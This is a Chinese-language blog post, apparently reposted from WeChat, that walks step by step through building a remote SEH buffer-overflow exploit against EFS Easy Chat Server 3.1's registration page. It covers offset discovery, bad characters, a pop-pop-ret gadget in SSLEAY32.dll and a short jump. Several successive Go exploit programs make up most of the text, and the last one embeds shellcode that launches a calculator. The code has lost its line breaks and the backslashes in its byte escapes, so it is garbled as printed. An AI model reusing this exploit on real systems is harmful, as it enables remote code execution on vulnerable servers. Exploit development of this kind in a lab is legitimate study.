> exploit-db https://www.exploit-db.com/exploits/42155
> 下载链接 https://www.exploit-db.com/apps/c682138ebbea9af7948a3f142bbd054b-ecssetup.exe
---
## 1. 基础信息
## 2. 写个PoC
- 安装后效果如图
- 看`expdb`上面的代码**缓冲区溢出**触发点在注册页面的**用户名**处,使用`burpsuite`抓个包然后直接插件`copy as go request`
package mainimport ("bytes""crypto/tls""encoding/binary""fmt""io""net/http""strings")func main() {payload := strings.Repeat("x41", 1000)headers := map[string]string{"Host": "10.11.11.8","Content-Length": "179","Origin": "http://10.11.11.8","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","Referer": "http://10.11.11.8/register.ghp","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6","Connection": "close",}var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))for k, v := range headers {request.Header.Set(k, v)}customTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true},}client := &http.Client{Transport: customTransport}response, error := client.Do(request)defer response.Body.Close()if error != nil {panic(error)}body, _ := io.ReadAll(response.Body)fmt.Println("response Status:", response.Status)fmt.Println("response Body:", string(body))return response}
## 3. 定位offset
- 生成1000有序字符串替换`x41`,然后发送数据包
- 崩了,`g`一下
- `EIP`指令指针的值是**34684133**
```bash
┌──(root㉿kali)-[~]
└─#msf-pattern_offset-q34684133-l1000
[*] Exact match at offset 221
┌──(root㉿kali)-[~]
└─#
```
> 但是查看`ESP`等寄存器发现并没有想要的内容,通过查看`Exception Handler`发现崩溃点
> 当前的错误处理机制的指令地址被覆盖,造成`SEH(Structured Exception Handling Windows默认异常处理机制)`污染,而被污染的`SEH`可根据实际情况进行代码执行攻击。
## 4. 坏字符串
生成字符串并排除 **x00** `!py mona ba -cpb "x00"`
- 现在知道 **221**个字符串可造成`seh`污染,那么对`SEH`攻击需要执行 **ppr** 即 `pop 某个寄存器 pop 某个寄存器 ret`指令,那么需要崩溃长度减去一条指令的长度即 **-4**,修改`PoC`
package mainimport ("bytes""crypto/tls""fmt""io""net/http""strings")func main() {payload := strings.Repeat("x41", 217)payload += "BBBBCCCC"payload += "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"payload += strings.Repeat("x44", 1000-len(payload))headers := map[string]string{"Host": "10.11.11.8","Content-Length": "179","Origin": "http://10.11.11.8","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","Referer": "http://10.11.11.8/register.ghp","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6","Connection": "close",}var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))for k, v := range headers {request.Header.Set(k, v)}customTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true},}client := &http.Client{Transport: customTransport}response, error := client.Do(request)defer response.Body.Close()if error != nil {panic(error)}body, _ := io.ReadAll(response.Body)fmt.Println("response Status:", response.Status)fmt.Println("response Body:", string(body))return response}
- 重启`windbg`后附加到程序,然后发送数据包并自动化对比
## 5. 寻找PPR
- 使用`mona`自己去找这个指令发现了一大堆,但是相信能用的也没几个
- 一大堆的**00**让人头疼啊
- 既然不行就排除吧
- 现在好了,世界清净了不少,只有**190**个,随便选一个吧
`0x10018793 | 0x10018793 : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [SSLEAY32.dll] ASLR: False, Rebase: False, SafeSEH: False, CFG: False, OS: False, v-1.0- (C:EFS SoftwareEasy Chat ServerSSLEAY32.dll), 0x0`
- 所有的保护属性都是**false**,而且还不含有`badchars`,美滋儿滋儿~
- 验证一下
package mainimport ("bytes""crypto/tls""encoding/binary""fmt""io""net/http""strings")func main() {seh := make([]byte, 4)binary.LittleEndian.PutUint32(seh, 0x10018793)payload := strings.Repeat("x41", 217)payload += "BBBB"payload += string(seh) //0x10018793 | 0x10018793 : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [SSLEAY32.dll] ASLR: False, Rebase: False, SafeSEH: False, CFG: False, OS: False, v-1.0- (C:EFS SoftwareEasy Chat ServerSSLEAY32.dll), 0x0payload += strings.Repeat("x44", 1000-len(payload))headers := map[string]string{"Host": "10.11.11.8","Content-Length": "179","Origin": "http://10.11.11.8","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","Referer": "http://10.11.11.8/register.ghp","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6","Connection": "close",}var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))for k, v := range headers {request.Header.Set(k, v)}customTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true},}client := &http.Client{Transport: customTransport}response, error := client.Do(request)defer response.Body.Close()if error != nil {panic(error)}body, _ := io.ReadAll(response.Body)fmt.Println("response Status:", response.Status)fmt.Println("response Body:", string(body))return response}
- 重启程序、附加程序、打个断点,g一下,发送数据一条龙服务
- 崩了,`g`一下
- 很好,`t`三下,看`ret`到哪里
- **4个** `B`,那么有限的指令,只能做跳转了。
- 让代码跳转到这里似乎就成了最优解
- 得到的代码是`eb 06` 那么还得看看接下来有多大的操作空间
- 内存中结束的地方的地址是**045c7120**,减去当前的地址看看有多大的空间。
- 768个字节,够用了。 直接 `x90`做个顺滑然后写`shellcode`了
package mainimport ("bytes""crypto/tls""encoding/binary""fmt""io""net/http""strings")func main() {seh := make([]byte, 4)binary.LittleEndian.PutUint32(seh, 0x10018793)payload := strings.Repeat("x41", 217)payload += "x90x90xebx06"payload += string(seh) //0x10018793 | 0x10018793 : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [SSLEAY32.dll] ASLR: False, Rebase: False, SafeSEH: False, CFG: False, OS: False, v-1.0- (C:EFS SoftwareEasy Chat ServerSSLEAY32.dll), 0x0payload += strings.Repeat("x44", 1000-len(payload))headers := map[string]string{"Host": "10.11.11.8","Content-Length": "179","Origin": "http://10.11.11.8","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","Referer": "http://10.11.11.8/register.ghp","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6","Connection": "close",}var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))for k, v := range headers {request.Header.Set(k, v)}customTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true},}client := &http.Client{Transport: customTransport}response, error := client.Do(request)defer response.Body.Close()if error != nil {panic(error)}body, _ := io.ReadAll(response.Body)fmt.Println("response Status:", response.Status)fmt.Println("response Body:", string(body))return response}
## 6.小跳一下
- 重启程序,附加程序,打个断点,g一下运行,发包看崩溃一条龙啊
- 很好,跳转成功,直接填充然后写`shellcode`
## 7. 弹计算器
- 生成`shellcode`
- 修改后的代码
package mainimport ("bytes""crypto/tls""encoding/binary""fmt""io""net/http""strings")func main() {shellcode := string([]byte{0xbd, 0xfa, 0xd1, 0x0b, 0xc2, 0xda, 0xcd, 0xd9, 0x74,0x24, 0xf4, 0x5b, 0x29, 0xc9, 0xb1, 0x30, 0x31, 0x6b, 0x13, 0x03, 0x6b,0x13, 0x83, 0xc3, 0xfe, 0x33, 0xfe, 0x3e, 0x16, 0x31, 0x01, 0xbf, 0xe6,0x56, 0x8b, 0x5a, 0xd7, 0x56, 0xef, 0x2f, 0x47, 0x67, 0x7b, 0x7d, 0x6b,0x0c, 0x29, 0x96, 0xf8, 0x60, 0xe6, 0x99, 0x49, 0xce, 0xd0, 0x94, 0x4a,0x63, 0x20, 0xb6, 0xc8, 0x7e, 0x75, 0x18, 0xf1, 0xb0, 0x88, 0x59, 0x36,0xac, 0x61, 0x0b, 0xef, 0xba, 0xd4, 0xbc, 0x84, 0xf7, 0xe4, 0x37, 0xd6,0x16, 0x6d, 0xab, 0xae, 0x19, 0x5c, 0x7a, 0xa5, 0x43, 0x7e, 0x7c, 0x6a,0xf8, 0x37, 0x66, 0x6f, 0xc5, 0x8e, 0x1d, 0x5b, 0xb1, 0x10, 0xf4, 0x92,0x3a, 0xbe, 0x39, 0x1b, 0xc9, 0xbe, 0x7e, 0x9b, 0x32, 0xb5, 0x76, 0xd8,0xcf, 0xce, 0x4c, 0xa3, 0x0b, 0x5a, 0x57, 0x03, 0xdf, 0xfc, 0xb3, 0xb2,0x0c, 0x9a, 0x30, 0xb8, 0xf9, 0xe8, 0x1f, 0xdc, 0xfc, 0x3d, 0x14, 0xd8,0x75, 0xc0, 0xfb, 0x69, 0xcd, 0xe7, 0xdf, 0x32, 0x95, 0x86, 0x46, 0x9e,0x78, 0xb6, 0x99, 0x41, 0x24, 0x12, 0xd1, 0x6f, 0x31, 0x2f, 0xb8, 0xe5,0xc4, 0xbd, 0xc6, 0x4b, 0xc6, 0xbd, 0xc8, 0xfb, 0xaf, 0x8c, 0x43, 0x94,0xa8, 0x10, 0x86, 0xd1, 0x57, 0xf3, 0x03, 0x2f, 0xf0, 0xaa, 0xc1, 0x92,0x9d, 0x4c, 0x3c, 0xd0, 0x9b, 0xce, 0xb5, 0xa8, 0x5f, 0xce, 0xbf, 0xad,0x24, 0x48, 0x53, 0xdf, 0x35, 0x3d, 0x53, 0x4c, 0x35, 0x14, 0x30, 0x13,0xa5, 0xf4, 0xb7})seh := make([]byte, 4)binary.LittleEndian.PutUint32(seh, 0x10018793)payload := strings.Repeat("x41", 217)payload += "x90x90xebx06" // nsehpayload += string(seh) //0x10018793 | 0x10018793 : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [SSLEAY32.dll] ASLR: False, Rebase: False, SafeSEH: False, CFG: False, OS: False, v-1.0- (C:EFS SoftwareEasy Chat ServerSSLEAY32.dll), 0x0payload += strings.Repeat("x90", 24)payload += shellcodepayload += strings.Repeat("x44", 1000-len(payload))headers := map[string]string{"Host": "10.11.11.8","Content-Length": "179","Origin": "http://10.11.11.8","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","Referer": "http://10.11.11.8/register.ghp","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6","Connection": "close",}var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))for k, v := range headers {request.Header.Set(k, v)}customTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true},}client := &http.Client{Transport: customTransport}response, error := client.Do(request)defer response.Body.Close()if error != nil {panic(error)}body, _ := io.ReadAll(response.Body)fmt.Println("response Status:", response.Status)fmt.Println("response Body:", string(body))return response}
- 编译
- 效果
原文始发于微信公众号(瘾大技术差):EFS Easy Chat Server 3.1 远程seh缓冲区溢出
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论